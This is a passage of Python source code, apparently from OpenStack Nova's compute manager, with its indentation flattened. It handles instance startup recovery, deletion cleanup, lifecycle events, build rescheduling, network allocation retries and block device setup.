'option and restart nova-compute.'),
{'uuid': instance.uuid,
'host': instance.host})
continue
LOG.info(_LI('Deleting instance as its host ('
'%(instance_host)s) is not equal to our '
'host (%(our_host)s).'),
{'instance_host': instance.host,
'our_host': our_host}, instance=instance)
try:
network_info = self._get_instance_nw_info(context,
instance)
bdi = self._get_instance_block_device_info(context,
instance)
destroy_disks = not (self._is_instance_storage_shared(
context, instance))
except exception.InstanceNotFound:
network_info = network_model.NetworkInfo()
bdi = {}
LOG.info(_LI('Instance has been marked deleted already, '
'removing it from the hypervisor.'),
instance=instance)
# always destroy disks if the instance was deleted
destroy_disks = True
self.driver.destroy(context, instance,
network_info,
bdi, destroy_disks)
def _is_instance_storage_shared(self, context, instance, host=None):
shared_storage = True
data = None
try:
data = self.driver.check_instance_shared_storage_local(context,
instance)
if data:
shared_storage = (self.compute_rpcapi.
check_instance_shared_storage(context,
instance, data, host=host))
except NotImplementedError:
LOG.warning(_LW('Hypervisor driver does not support '
'instance shared storage check, '
'assuming it\'s not on shared storage'),
instance=instance)
shared_storage = False
except Exception:
LOG.exception(_LE('Failed to check if instance shared'),
instance=instance)
finally:
if data:
self.driver.check_instance_shared_storage_cleanup(context,
data)
return shared_storage
def _complete_partial_deletion(self, context, instance):
"""Complete deletion for instances in DELETED status but not marked as
deleted in the DB
"""
system_meta = instance.system_metadata
instance.destroy()
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
quotas = objects.Quotas(context=context)
project_id, user_id = objects.quotas.ids_from_instance(context,
instance)
quotas.reserve(project_id=project_id, user_id=user_id, instances=-1,
cores=-instance.vcpus, ram=-instance.memory_mb)
self._complete_deletion(context,
instance,
bdms,
quotas,
system_meta)
def _complete_deletion(self, context, instance, bdms,
quotas, system_meta):
if quotas:
quotas.commit()
# ensure block device mappings are not leaked
for bdm in bdms:
bdm.destroy()
self._notify_about_instance_usage(context, instance, "delete.end",
system_metadata=system_meta)
if CONF.vnc_enabled or CONF.spice.enabled:
if CONF.cells.enable:
self.cells_rpcapi.consoleauth_delete_tokens(context,
instance.uuid)
else:
self.consoleauth_rpcapi.delete_tokens_for_instance(context,
instance.uuid)
self._delete_scheduler_instance_info(context, instance.uuid)
def _create_reservations(self, context, instance, project_id, user_id):
vcpus = instance.vcpus
mem_mb = instance.memory_mb
quotas = objects.Quotas(context=context)
quotas.reserve(project_id=project_id,
user_id=user_id,
instances=-1,
cores=-vcpus,
ram=-mem_mb)
return quotas
def _init_instance(self, context, instance):
'''Initialize this instance during service init.'''
# NOTE(danms): If the instance appears to not be owned by this
# host, it may have been evacuated away, but skipped by the
# evacuation cleanup code due to configuration. Thus, if that
# is a possibility, don't touch the instance in any way, but
# log the concern. This will help avoid potential issues on
# startup due to misconfiguration.
if instance.host != self.host:
LOG.warning(_LW('Instance %(uuid)s appears to not be owned '
'by this host, but by %(host)s. Startup '
'processing is being skipped.'),
{'uuid': instance.uuid,
'host': instance.host})
return
# Instances that are shut down, or in an error state can not be
# initialized and are not attempted to be recovered. The exception
# to this are instances that are in RESIZE_MIGRATING or DELETING,
# which are dealt with further down.
if (instance.vm_state == vm_states.SOFT_DELETED or
(instance.vm_state == vm_states.ERROR and
instance.task_state not in
(task_states.RESIZE_MIGRATING, task_states.DELETING))):
LOG.debug("Instance is in %s state.",
instance.vm_state, instance=instance)
return
if instance.vm_state == vm_states.DELETED:
try:
self._complete_partial_deletion(context, instance)
except Exception:
# we don't want that an exception blocks the init_host
msg = _LE('Failed to complete a deletion')
LOG.exception(msg, instance=instance)
return
if (instance.vm_state == vm_states.BUILDING or
instance.task_state in [task_states.SCHEDULING,
task_states.BLOCK_DEVICE_MAPPING,
task_states.NETWORKING,
task_states.SPAWNING]):
# NOTE(dave-mcnally) compute stopped before instance was fully
# spawned so set to ERROR state. This is safe to do as the state
# may be set by the api but the host is not so if we get here the
# instance has already been scheduled to this particular host.
LOG.debug("Instance failed to spawn correctly, "
"setting to ERROR state", instance=instance)
instance.task_state = None
instance.vm_state = vm_states.ERROR
instance.save()
return
if (instance.vm_state in [vm_states.ACTIVE, vm_states.STOPPED] and
instance.task_state in [task_states.REBUILDING,
task_states.REBUILD_BLOCK_DEVICE_MAPPING,
task_states.REBUILD_SPAWNING]):
# NOTE(jichenjc) compute stopped before instance was fully
# spawned so set to ERROR state. This is consistent to BUILD
LOG.debug("Instance failed to rebuild correctly, "
"setting to ERROR state", instance=instance)
instance.task_state = None
instance.vm_state = vm_states.ERROR
instance.save()
return
if (instance.vm_state != vm_states.ERROR and
instance.task_state in [task_states.IMAGE_SNAPSHOT_PENDING,
task_states.IMAGE_PENDING_UPLOAD,
task_states.IMAGE_UPLOADING,
task_states.IMAGE_SNAPSHOT]):
LOG.debug("Instance in transitional state %s at start-up "
"clearing task state",
instance.task_state, instance=instance)
try:
self._post_interrupted_snapshot_cleanup(context, instance)
except Exception:
# we don't want that an exception blocks the init_host
msg = _LE('Failed to cleanup snapshot.')
LOG.exception(msg, instance=instance)
instance.task_state = None
instance.save()
if (instance.vm_state != vm_states.ERROR and
instance.task_state in [task_states.RESIZE_PREP]):
LOG.debug("Instance in transitional state %s at start-up "
"clearing task state",
instance['task_state'], instance=instance)
instance.task_state = None
instance.save()
if instance.task_state == task_states.DELETING:
try:
LOG.info(_LI('Service started deleting the instance during '
'the previous run, but did not finish. Restarting'
' the deletion now.'), instance=instance)
instance.obj_load_attr('metadata')
instance.obj_load_attr('system_metadata')
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
project_id, user_id = objects.quotas.ids_from_instance(
context, instance)
quotas = self._create_reservations(context, instance,
project_id, user_id)
self._delete_instance(context, instance, bdms, quotas)
except Exception:
# we don't want that an exception blocks the init_host
msg = _LE('Failed to complete a deletion')
LOG.exception(msg, instance=instance)
self._set_instance_error_state(context, instance)
return
try_reboot, reboot_type = self._retry_reboot(context, instance)
current_power_state = self._get_power_state(context, instance)
if try_reboot:
LOG.debug("Instance in transitional state (%(task_state)s) at "
"start-up and power state is (%(power_state)s), "
"triggering reboot",
{'task_state': instance.task_state,
'power_state': current_power_state},
instance=instance)
self.compute_rpcapi.reboot_instance(context, instance,
block_device_info=None,
reboot_type=reboot_type)
return
elif (current_power_state == power_state.RUNNING and
instance.task_state in [task_states.REBOOT_STARTED,
task_states.REBOOT_STARTED_HARD,
task_states.PAUSING,
task_states.UNPAUSING]):
LOG.warning(_LW("Instance in transitional state "
"(%(task_state)s) at start-up and power state "
"is (%(power_state)s), clearing task state"),
{'task_state': instance.task_state,
'power_state': current_power_state},
instance=instance)
instance.task_state = None
instance.vm_state = vm_states.ACTIVE
instance.save()
elif (current_power_state == power_state.PAUSED and
instance.task_state == task_states.UNPAUSING):
LOG.warning(_LW("Instance in transitional state "
"(%(task_state)s) at start-up and power state "
"is (%(power_state)s), clearing task state "
"and unpausing the instance"),
{'task_state': instance.task_state,
'power_state': current_power_state},
instance=instance)
try:
self.unpause_instance(context, instance)
except NotImplementedError:
# Some virt driver didn't support pause and unpause
pass
except Exception:
LOG.exception(_LE('Failed to unpause instance'),
instance=instance)
return
if instance.task_state == task_states.POWERING_OFF:
try:
LOG.debug("Instance in transitional state %s at start-up "
"retrying stop request",
instance.task_state, instance=instance)
self.stop_instance(context, instance)
except Exception:
# we don't want that an exception blocks the init_host
msg = _LE('Failed to stop instance')
LOG.exception(msg, instance=instance)
return
if instance.task_state == task_states.POWERING_ON:
try:
LOG.debug("Instance in transitional state %s at start-up "
"retrying start request",
instance.task_state, instance=instance)
self.start_instance(context, instance)
except Exception:
# we don't want that an exception blocks the init_host
msg = _LE('Failed to start instance')
LOG.exception(msg, instance=instance)
return
net_info = compute_utils.get_nw_info_for_instance(instance)
try:
self.driver.plug_vifs(instance, net_info)
except NotImplementedError as e:
LOG.debug(e, instance=instance)
except exception.VirtualInterfacePlugException:
# we don't want an exception to block the init_host
LOG.exception(_LE("Vifs plug failed"), instance=instance)
self._set_instance_error_state(context, instance)
return
if instance.task_state == task_states.RESIZE_MIGRATING:
# We crashed during resize/migration, so roll back for safety
try:
# NOTE(mriedem): check old_vm_state for STOPPED here, if it's
# not in system_metadata we default to True for backwards
# compatibility
power_on = (instance.system_metadata.get('old_vm_state') !=
vm_states.STOPPED)
block_dev_info = self._get_instance_block_device_info(context,
instance)
self.driver.finish_revert_migration(context,
instance, net_info, block_dev_info, power_on)
except Exception:
LOG.exception(_LE('Failed to revert crashed migration'),
instance=instance)
finally:
LOG.info(_LI('Instance found in migrating state during '
'startup. Resetting task_state'),
instance=instance)
instance.task_state = None
instance.save()
if instance.task_state == task_states.MIGRATING:
# Live migration did not complete, but instance is on this
# host, so reset the state.
instance.task_state = None
instance.save(expected_task_state=[task_states.MIGRATING])
db_state = instance.power_state
drv_state = self._get_power_state(context, instance)
expect_running = (db_state == power_state.RUNNING and
drv_state != db_state)
LOG.debug('Current state is %(drv_state)s, state in DB is '
'%(db_state)s.',
{'drv_state': drv_state, 'db_state': db_state},
instance=instance)
if expect_running and CONF.resume_guests_state_on_host_boot:
LOG.info(_LI('Rebooting instance after nova-compute restart.'),
instance=instance)
block_device_info = \
self._get_instance_block_device_info(context, instance)
try:
self.driver.resume_state_on_host_boot(
context, instance, net_info, block_device_info)
except NotImplementedError:
LOG.warning(_LW('Hypervisor driver does not support '
'resume guests'), instance=instance)
except Exception:
# NOTE(vish): The instance failed to resume, so we set the
# instance to error and attempt to continue.
LOG.warning(_LW('Failed to resume instance'),
instance=instance)
self._set_instance_error_state(context, instance)
elif drv_state == power_state.RUNNING:
# VMwareAPI drivers will raise an exception
try:
self.driver.ensure_filtering_rules_for_instance(
instance, net_info)
except NotImplementedError:
LOG.warning(_LW('Hypervisor driver does not support '
'firewall rules'), instance=instance)
def _retry_reboot(self, context, instance):
current_power_state = self._get_power_state(context, instance)
current_task_state = instance.task_state
retry_reboot = False
reboot_type = compute_utils.get_reboot_type(current_task_state,
current_power_state)
pending_soft = (current_task_state == task_states.REBOOT_PENDING and
instance.vm_state in vm_states.ALLOW_SOFT_REBOOT)
pending_hard = (current_task_state == task_states.REBOOT_PENDING_HARD
and instance.vm_state in vm_states.ALLOW_HARD_REBOOT)
started_not_running = (current_task_state in
[task_states.REBOOT_STARTED,
task_states.REBOOT_STARTED_HARD] and
current_power_state != power_state.RUNNING)
if pending_soft or pending_hard or started_not_running:
retry_reboot = True
return retry_reboot, reboot_type
def handle_lifecycle_event(self, event):
LOG.info(_LI("VM %(state)s (Lifecycle Event)"),
{'state': event.get_name()},
instance_uuid=event.get_instance_uuid())
context = nova.context.get_admin_context(read_deleted='yes')
instance = objects.Instance.get_by_uuid(context,
event.get_instance_uuid(),
expected_attrs=[])
vm_power_state = None
if event.get_transition() == virtevent.EVENT_LIFECYCLE_STOPPED:
vm_power_state = power_state.SHUTDOWN
elif event.get_transition() == virtevent.EVENT_LIFECYCLE_STARTED:
vm_power_state = power_state.RUNNING
elif event.get_transition() == virtevent.EVENT_LIFECYCLE_PAUSED:
vm_power_state = power_state.PAUSED
elif event.get_transition() == virtevent.EVENT_LIFECYCLE_RESUMED:
vm_power_state = power_state.RUNNING
else:
LOG.warning(_LW("Unexpected power state %d"),
event.get_transition())
if vm_power_state is not None:
LOG.debug('Synchronizing instance power state after lifecycle '
'event "%(event)s"; current vm_state: %(vm_state)s, '
'current task_state: %(task_state)s, current DB '
'power_state: %(db_power_state)s, VM power_state: '
'%(vm_power_state)s',
dict(event=event.get_name(),
vm_state=instance.vm_state,
task_state=instance.task_state,
db_power_state=instance.power_state,
vm_power_state=vm_power_state),
instance_uuid=instance.uuid)
self._sync_instance_power_state(context,
instance,
vm_power_state)
def handle_events(self, event):
if isinstance(event, virtevent.LifecycleEvent):
try:
self.handle_lifecycle_event(event)
except exception.InstanceNotFound:
LOG.debug("Event %s arrived for non-existent instance. The "
"instance was probably deleted.", event)
else:
LOG.debug("Ignoring event %s", event)
def init_virt_events(self):
self.driver.register_event_listener(self.handle_events)
def init_host(self):
"""Initialization for a standalone compute service."""
self.driver.init_host(host=self.host)
context = nova.context.get_admin_context()
instances = objects.InstanceList.get_by_host(
context, self.host, expected_attrs=['info_cache', 'metadata'])
if CONF.defer_iptables_apply:
self.driver.filter_defer_apply_on()
self.init_virt_events()
try:
# checking that instance was not already evacuated to other host
self._destroy_evacuated_instances(context)
for instance in instances:
self._init_instance(context, instance)
finally:
if CONF.defer_iptables_apply:
self.driver.filter_defer_apply_off()
self._update_scheduler_instance_info(context, instances)
def cleanup_host(self):
self.driver.register_event_listener(None)
self.instance_events.cancel_all_events()
self.driver.cleanup_host(host=self.host)
def pre_start_hook(self):
"""After the service is initialized, but before we fully bring
the service up by listening on RPC queues, make sure to update
our available resources (and indirectly our available nodes).
"""
self.update_available_resource(nova.context.get_admin_context())
def _get_power_state(self, context, instance):
"""Retrieve the power state for the given instance."""
LOG.debug('Checking state', instance=instance)
try:
return self.driver.get_info(instance).state
except exception.InstanceNotFound:
return power_state.NOSTATE
def get_console_topic(self, context):
"""Retrieves the console host for a project on this host.
Currently this is just set in the flags for each compute host.
"""
# TODO(mdragon): perhaps make this variable by console_type?
return '%s.%s' % (CONF.console_topic, CONF.console_host)
@wrap_exception()
def get_console_pool_info(self, context, console_type):
return self.driver.get_console_pool_info(console_type)
@wrap_exception()
def refresh_security_group_rules(self, context, security_group_id):
"""Tell the virtualization driver to refresh security group rules.
Passes straight through to the virtualization driver.
"""
return self.driver.refresh_security_group_rules(security_group_id)
@wrap_exception()
def refresh_security_group_members(self, context, security_group_id):
"""Tell the virtualization driver to refresh security group members.
Passes straight through to the virtualization driver.
"""
return self.driver.refresh_security_group_members(security_group_id)
@object_compat
@wrap_exception()
def refresh_instance_security_rules(self, context, instance):
"""Tell the virtualization driver to refresh security rules for
an instance.
Passes straight through to the virtualization driver.
Synchronise the call because we may still be in the middle of
creating the instance.
"""
@utils.synchronized(instance.uuid)
def _sync_refresh():
try:
return self.driver.refresh_instance_security_rules(instance)
except NotImplementedError:
LOG.warning(_LW('Hypervisor driver does not support '
'security groups.'), instance=instance)
return _sync_refresh()
@wrap_exception()
def refresh_provider_fw_rules(self, context):
"""This call passes straight through to the virtualization driver."""
return self.driver.refresh_provider_fw_rules()
def _get_instance_nw_info(self, context, instance):
"""Get a list of dictionaries of network data of an instance."""
return self.network_api.get_instance_nw_info(context, instance)
def _await_block_device_map_created(self, context, vol_id):
# TODO(yamahata): creating volume simultaneously
# reduces creation time?
# TODO(yamahata): eliminate dumb polling
start = time.time()
retries = CONF.block_device_allocate_retries
if retries < 0:
LOG.warning(_LW("Treating negative config value (%(retries)s) for "
"'block_device_retries' as 0."),
{'retries': retries})
# (1) treat negative config value as 0
# (2) the configured value is 0, one attempt should be made
# (3) the configured value is > 0, then the total number attempts
# is (retries + 1)
attempts = 1
if retries >= 1:
attempts = retries + 1
for attempt in range(1, attempts + 1):
volume = self.volume_api.get(context, vol_id)
volume_status = volume['status']
if volume_status not in ['creating', 'downloading']:
if volume_status == 'available':
return attempt
LOG.warning(_LW("Volume id: %(vol_id)s finished being "
"created but its status is %(vol_status)s."),
{'vol_id': vol_id,
'vol_status': volume_status})
break
greenthread.sleep(CONF.block_device_allocate_retries_interval)
raise exception.VolumeNotCreated(volume_id=vol_id,
seconds=int(time.time() - start),
attempts=attempt,
volume_status=volume_status)
def _decode_files(self, injected_files):
"""Base64 decode the list of files to inject."""
if not injected_files:
return []
def _decode(f):
path, contents = f
try:
decoded = base64.b64decode(contents)
return path, decoded
except TypeError:
raise exception.Base64Exception(path=path)
return [_decode(f) for f in injected_files]
def _run_instance(self, context, request_spec,
filter_properties, requested_networks, injected_files,
admin_password, is_first_time, node, instance,
legacy_bdm_in_spec):
"""Launch a new instance with specified options."""
extra_usage_info = {}
def notify(status, msg="", fault=None, **kwargs):
"""Send a create.{start,error,end} notification."""
type_ = "create.%(status)s" % dict(status=status)
info = extra_usage_info.copy()
info['message'] = msg
self._notify_about_instance_usage(context, instance, type_,
extra_usage_info=info, fault=fault, **kwargs)
try:
self._prebuild_instance(context, instance)
if request_spec and request_spec.get('image'):
image_meta = request_spec['image']
else:
image_meta = {}
extra_usage_info = {"image_name": image_meta.get('name', '')}
notify("start") # notify that build is starting
instance, network_info = self._build_instance(context,
request_spec, filter_properties, requested_networks,
injected_files, admin_password, is_first_time, node,
instance, image_meta, legacy_bdm_in_spec)
notify("end", msg=_("Success"), network_info=network_info)
except exception.RescheduledException as e:
# Instance build encountered an error, and has been rescheduled.
notify("error", fault=e)
except exception.BuildAbortException as e:
# Instance build aborted due to a non-failure
LOG.info(e)
notify("end", msg=e.format_message()) # notify that build is done
except Exception as e:
# Instance build encountered a non-recoverable error:
with excutils.save_and_reraise_exception():
self._set_instance_error_state(context, instance)
notify("error", fault=e) # notify that build failed
def _prebuild_instance(self, context, instance):
self._check_instance_exists(context, instance)
try:
self._start_building(context, instance)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
msg = _("Instance disappeared before we could start it")
# Quickly bail out of here
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
def _validate_instance_group_policy(self, context, instance,
filter_properties):
# NOTE(russellb) Instance group policy is enforced by the scheduler.
# However, there is a race condition with the enforcement of
# anti-affinity. Since more than one instance may be scheduled at the
# same time, it's possible that more than one instance with an
# anti-affinity policy may end up here. This is a validation step to
# make sure that starting the instance here doesn't violate the policy.
scheduler_hints = filter_properties.get('scheduler_hints') or {}
group_hint = scheduler_hints.get('group')
if not group_hint:
return
@utils.synchronized(group_hint)
def _do_validation(context, instance, group_hint):
group = objects.InstanceGroup.get_by_hint(context, group_hint)
if 'anti-affinity' not in group.policies:
return
group_hosts = group.get_hosts(exclude=[instance.uuid])
if self.host in group_hosts:
msg = _("Anti-affinity instance group policy was violated.")
raise exception.RescheduledException(
instance_uuid=instance.uuid,
reason=msg)
_do_validation(context, instance, group_hint)
def _build_instance(self, context, request_spec, filter_properties,
requested_networks, injected_files, admin_password, is_first_time,
node, instance, image_meta, legacy_bdm_in_spec):
original_context = context
context = context.elevated()
# NOTE(danms): This method is deprecated, but could be called,
# and if it is, it will have an old megatuple for requested_networks.
if requested_networks is not None:
requested_networks_obj = objects.NetworkRequestList(
objects=[objects.NetworkRequest.from_tuple(t)
for t in requested_networks])
else:
requested_networks_obj = None
# If neutron security groups pass requested security
# groups to allocate_for_instance()
if request_spec and self.is_neutron_security_groups:
security_groups = request_spec.get('security_group')
else:
security_groups = []
if node is None:
node = self.driver.get_available_nodes(refresh=True)[0]
LOG.debug("No node specified, defaulting to %s", node)
network_info = None
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
# b64 decode the files to inject:
injected_files_orig = injected_files
injected_files = self._decode_files(injected_files)
rt = self._get_resource_tracker(node)
try:
limits = filter_properties.get('limits', {})
with rt.instance_claim(context, instance, limits):
# NOTE(russellb) It's important that this validation be done
# *after* the resource tracker instance claim, as that is where
# the host is set on the instance.
self._validate_instance_group_policy(context, instance,
filter_properties)
macs = self.driver.macs_for_instance(instance)
dhcp_options = self.driver.dhcp_options_for_instance(instance)
network_info = self._allocate_network(original_context,
instance, requested_networks_obj, macs,
security_groups, dhcp_options)
# Verify that all the BDMs have a device_name set and assign a
# default to the ones missing it with the help of the driver.
self._default_block_device_names(context, instance, image_meta,
bdms)
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.BLOCK_DEVICE_MAPPING
instance.save()
block_device_info = self._prep_block_device(
context, instance, bdms)
set_access_ip = (is_first_time and
not instance.access_ip_v4 and
not instance.access_ip_v6)
instance = self._spawn(context, instance, image_meta,
network_info, block_device_info,
injected_files, admin_password,
set_access_ip=set_access_ip)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
# the instance got deleted during the spawn
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
try:
self._deallocate_network(context, instance)
except Exception:
msg = _LE('Failed to dealloc network '
'for deleted instance')
LOG.exception(msg, instance=instance)
raise exception.BuildAbortException(
instance_uuid=instance.uuid,
reason=_("Instance disappeared during build"))
except (exception.UnexpectedTaskStateError,
exception.VirtualInterfaceCreateException) as e:
# Don't try to reschedule, just log and reraise.
with excutils.save_and_reraise_exception():
LOG.debug(e.format_message(), instance=instance)
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
except exception.InvalidBDM:
with excutils.save_and_reraise_exception():
if network_info is not None:
network_info.wait(do_raise=False)
try:
self._deallocate_network(context, instance)
except Exception:
msg = _LE('Failed to dealloc network '
'for failed instance')
LOG.exception(msg, instance=instance)
except Exception:
exc_info = sys.exc_info()
# try to re-schedule instance:
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
rescheduled = self._reschedule_or_error(original_context, instance,
exc_info, requested_networks, admin_password,
injected_files_orig, is_first_time, request_spec,
filter_properties, bdms, legacy_bdm_in_spec)
if rescheduled:
# log the original build error
self._log_original_error(exc_info, instance.uuid)
raise exception.RescheduledException(
instance_uuid=instance.uuid,
reason=six.text_type(exc_info[1]))
else:
# not re-scheduling, go to error:
raise exc_info[0], exc_info[1], exc_info[2]
# spawn success
return instance, network_info
def _log_original_error(self, exc_info, instance_uuid):
LOG.error(_LE('Error: %s'), exc_info[1], instance_uuid=instance_uuid,
exc_info=exc_info)
def _reschedule_or_error(self, context, instance, exc_info,
requested_networks, admin_password, injected_files, is_first_time,
request_spec, filter_properties, bdms=None,
legacy_bdm_in_spec=True):
"""Try to re-schedule the build or re-raise the original build error to
error out the instance.
"""
original_context = context
context = context.elevated()
instance_uuid = instance.uuid
rescheduled = False
compute_utils.add_instance_fault_from_exc(context,
instance, exc_info[1], exc_info=exc_info)
self._notify_about_instance_usage(context, instance,
'instance.create.error', fault=exc_info[1])
try:
LOG.debug("Clean up resource before rescheduling.",
instance=instance)
if bdms is None:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
self._shutdown_instance(context, instance,
bdms, requested_networks)
self._cleanup_volumes(context, instance.uuid, bdms)
except Exception:
# do not attempt retry if clean up failed:
with excutils.save_and_reraise_exception():
self._log_original_error(exc_info, instance_uuid)
try:
method_args = (request_spec, admin_password, injected_files,
requested_networks, is_first_time, filter_properties,
legacy_bdm_in_spec)
task_state = task_states.SCHEDULING
rescheduled = self._reschedule(original_context, request_spec,
filter_properties, instance,
self.scheduler_rpcapi.run_instance, method_args,
task_state, exc_info)
except Exception:
rescheduled = False
LOG.exception(_LE("Error trying to reschedule"),
instance_uuid=instance_uuid)
return rescheduled
def _reschedule(self, context, request_spec, filter_properties,
instance, reschedule_method, method_args, task_state,
exc_info=None):
"""Attempt to re-schedule a compute operation."""
instance_uuid = instance.uuid
retry = filter_properties.get('retry', None)
if not retry:
# no retry information, do not reschedule.
LOG.debug("Retry info not present, will not reschedule",
instance_uuid=instance_uuid)
return
if not request_spec:
LOG.debug("No request spec, will not reschedule",
instance_uuid=instance_uuid)
return
LOG.debug("Re-scheduling %(method)s: attempt %(num)d",
{'method': reschedule_method.func_name,
'num': retry['num_attempts']}, instance_uuid=instance_uuid)
# reset the task state:
self._instance_update(context, instance_uuid, task_state=task_state)
if exc_info:
# stringify to avoid circular ref problem in json serialization:
retry['exc'] = traceback.format_exception_only(exc_info[0],
exc_info[1])
reschedule_method(context, *method_args)
return True
@periodic_task.periodic_task
def _check_instance_build_time(self, context):
"""Ensure that instances are not stuck in build."""
timeout = CONF.instance_build_timeout
if timeout == 0:
return
filters = {'vm_state': vm_states.BUILDING,
'host': self.host}
building_insts = objects.InstanceList.get_by_filters(context,
filters, expected_attrs=[], use_slave=True)
for instance in building_insts:
if timeutils.is_older_than(instance.created_at, timeout):
self._set_instance_error_state(context, instance)
LOG.warning(_LW("Instance build timed out. Set to error "
"state."), instance=instance)
def _check_instance_exists(self, context, instance):
"""Ensure an instance with the same name is not already present."""
if self.driver.instance_exists(instance):
raise exception.InstanceExists(name=instance.name)
def _start_building(self, context, instance):
"""Save the host and launched_on fields and log appropriately."""
LOG.info(_LI('Starting instance...'), context=context,
instance=instance)
self._instance_update(context, instance.uuid,
vm_state=vm_states.BUILDING,
task_state=None,
expected_task_state=(task_states.SCHEDULING,
None))
def _allocate_network_async(self, context, instance, requested_networks,
macs, security_groups, is_vpn, dhcp_options):
"""Method used to allocate networks in the background.
Broken out for testing.
"""
LOG.debug("Allocating IP information in the background.",
instance=instance)
retries = CONF.network_allocate_retries
if retries < 0:
LOG.warning(_LW("Treating negative config value (%(retries)s) for "
"'network_allocate_retries' as 0."),
{'retries': retries})
retries = 0
attempts = retries + 1
retry_time = 1
for attempt in range(1, attempts + 1):
try:
nwinfo = self.network_api.allocate_for_instance(
context, instance, vpn=is_vpn,
requested_networks=requested_networks,
macs=macs,
security_groups=security_groups,
dhcp_options=dhcp_options)
LOG.debug('Instance network_info: |%s|', nwinfo,
instance=instance)
instance.system_metadata['network_allocated'] = 'True'
# NOTE(JoshNang) do not save the instance here, as it can cause
# races. The caller shares a reference to instance and waits
# for this async greenthread to finish before calling
# instance.save().
return nwinfo
except Exception:
exc_info = sys.exc_info()
log_info = {'attempt': attempt,
'attempts': attempts}
if attempt == attempts:
LOG.exception(_LE('Instance failed network setup '
'after %(attempts)d attempt(s)'),
log_info)
raise exc_info[0], exc_info[1], exc_info[2]
LOG.warning(_LW('Instance failed network setup '
'(attempt %(attempt)d of %(attempts)d)'),
log_info, instance=instance)
time.sleep(retry_time)
retry_time *= 2
if retry_time > 30:
retry_time = 30
# Not reached.
def _build_networks_for_instance(self, context, instance,
requested_networks, security_groups):
# If we're here from a reschedule the network may already be allocated.
if strutils.bool_from_string(
instance.system_metadata.get('network_allocated', 'False')):
# NOTE(alex_xu): The network_allocated is True means the network
# resource already allocated at previous scheduling, and the
# network setup is cleanup at previous. After rescheduling, the
# network resource need setup on the new host.
self.network_api.setup_instance_network_on_host(
context, instance, instance.host)
return self._get_instance_nw_info(context, instance)
if not self.is_neutron_security_groups:
security_groups = []
macs = self.driver.macs_for_instance(instance)
dhcp_options = self.driver.dhcp_options_for_instance(instance)
network_info = self._allocate_network(context, instance,
requested_networks, macs, security_groups, dhcp_options)
if not instance.access_ip_v4 and not instance.access_ip_v6:
# If CONF.default_access_ip_network_name is set, grab the
# corresponding network and set the access ip values accordingly.
# Note that when there are multiple ips to choose from, an
# arbitrary one will be chosen.
network_name = CONF.default_access_ip_network_name
if not network_name:
return network_info
for vif in network_info:
if vif['network']['label'] == network_name:
for ip in vif.fixed_ips():
if ip['version'] == 4:
instance.access_ip_v4 = ip['address']
if ip['version'] == 6:
instance.access_ip_v6 = ip['address']
instance.save()
break
return network_info
def _allocate_network(self, context, instance, requested_networks, macs,
security_groups, dhcp_options):
"""Start network allocation asynchronously. Return an instance
of NetworkInfoAsyncWrapper that can be used to retrieve the
allocated networks when the operation has finished.
"""
# NOTE(comstud): Since we're allocating networks asynchronously,
# this task state has little meaning, as we won't be in this
# state for very long.
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.NETWORKING
instance.save(expected_task_state=[None])
self._update_resource_tracker(context, instance)
is_vpn = pipelib.is_vpn_image(instance.image_ref)
return network_model.NetworkInfoAsyncWrapper(
self._allocate_network_async, context, instance,
requested_networks, macs, security_groups, is_vpn,
dhcp_options)
def _default_root_device_name(self, instance, image_meta, root_bdm):
try:
return self.driver.default_root_device_name(instance,
image_meta,
root_bdm)
except NotImplementedError:
return compute_utils.get_next_device_name(instance, [])
def _default_device_names_for_instance(self, instance,
root_device_name,
*block_device_lists):
try:
self.driver.default_device_names_for_instance(instance,
root_device_name,
*block_device_lists)
except NotImplementedError:
compute_utils.default_device_names_for_instance(
instance, root_device_name, *block_device_lists)
def _default_block_device_names(self, context, instance,
image_meta, block_devices):
"""Verify that all the devices have the device_name set. If not,
provide a default name.
It also ensures that there is a root_device_name and is set to the
first block device in the boot sequence (boot_index=0).
"""
root_bdm = block_device.get_root_bdm(block_devices)
if not root_bdm:
return
# Get the root_device_name from the root BDM or the instance
root_device_name = None
update_root_bdm = False
if root_bdm.device_name:
root_device_name = root_bdm.device_name
instance.root_device_name = root_device_name
elif instance.root_device_name:
root_device_name = instance.root_device_name
root_bdm.device_name = root_device_name
update_root_bdm = True
else:
root_device_name = self._default_root_device_name(instance,
image_meta,
root_bdm)
instance.root_device_name = root_device_name
root_bdm.device_name = root_device_name
update_root_bdm = True
if update_root_bdm:
root_bdm.save()
ephemerals = filter(block_device.new_format_is_ephemeral,
block_devices)
swap = filter(block_device.new_format_is_swap,
block_devices)
block_device_mapping = filter(
driver_block_device.is_block_device_mapping, block_devices)
self._default_device_names_for_instance(instance,
root_device_name,
ephemerals,
swap,
block_device_mapping)
def _prep_block_device(self, context, instance, bdms,
do_check_attach=True):
"""Set up the block device for an instance with error logging."""
try:
block_device_info = {
'root_device_name': instance.root_device_name,
'swap': driver_block_device.convert_swap(bdms),
'ephemerals': driver_block_device.convert_ephemerals(bdms),
'block_device_mapping': (
driver_block_device.attach_block_devices(
driver_block_device.convert_volumes(bdms),
context, instance, self.volume_api,
self.driver, do_check_attach=do_check_attach) +
driver_block_device.attach_block_devices(
driver_block_device.convert_snapshots(bdms),
context, instance, self.volume_api,
self.driver, self._await_block_device_map_created,
do_check_attach=do_check_attach) +
driver_block_device.attach_block_devices(
driver_block_device.convert_images(bdms),
context, instance, self.volume_api,
self.driver, self._await_block_device_map_created,
do_check_attach=do_check_attach) +
driver_block_device.attach_block_devices(
driver_block_device.convert_blanks(bdms),
context, instance, self.volume_api,
self.driver, self._await_block_device_map_created,
do_check_attach=do_check_attach))
}
if self.use_legacy_block_device_info:
for bdm_type in ('swap', 'ephemerals', 'block_device_mapping'):
block_device_info[bdm_type] = \
